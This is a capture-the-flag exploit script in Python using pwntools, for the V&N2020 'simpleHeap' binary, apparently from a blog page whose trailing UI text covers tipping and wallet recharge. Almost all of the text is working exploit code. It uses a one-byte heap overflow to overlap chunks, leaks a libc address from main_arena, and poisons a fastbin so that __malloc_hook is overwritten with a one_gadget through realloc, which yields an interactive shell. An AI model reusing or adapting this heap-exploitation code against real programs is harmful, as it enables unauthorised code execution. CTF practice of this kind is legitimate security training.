V&N2020 simpleHeap

# coding:utf-8
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = process('./vn_pwn_simpleHeap')


def add(size, content):
    p.sendlineafter("choice: ", '1')
    p.sendlineafter("size?", str(size))
    p.sendlineafter("content:", content)


def edit(idx, content):
    p.sendlineafter("choice: ", '2')
    p.sendlineafter("idx?", str(idx))
    p.sendlineafter("content:", content)


def show(idx):
    p.sendlineafter("choice: ", '3')
    p.sendlineafter("idx?", str(idx))


def delete(idx):
    p.sendlineafter("choice: ", '4')
    p.sendlineafter("idx?", str(idx))
add(24, '0000')
add(96, '1111')
add(96, '2222')
add(16, '3333')
edit(0, "A" * 0x18 + '\xe1')
delete(1)
# gdb.attach(p)
# gdb.attach(p)
add(96, '1111')
# gdb.attach(p)
show(2)
# gdb.attach(p)
main_arena_addr = u64(p.recvline()[:-1].ljust(8, '\x00')) - 88
print(hex(main_arena_addr))
libc_base = main_arena_addr - 0x3C4B20
malloc_hook = libc_base + 0x3c4b10
realloc_addr = libc_base + 0x846C0
libc_one_gadget = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
add(96, '4422')
log.success("add(96, '4422')")
delete(4)
# gdb.attach(p)
edit(2, p64(malloc_hook - 0x23) + '\n')
add(96, '4242')
# gdb.attach(p)
payload = "A" * (0x13 - 0x8) + p64(libc_base +
                                   libc_one_gadget[1]) + p64(realloc_addr + 0xd) + '\n'
add(96, payload)
log.success(hex(libc_base + libc_one_gadget[1]))
# gdb.attach(p)
p.sendlineafter("choice: ", '1')
p.sendlineafter("size?", '10')
p.interactive()
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值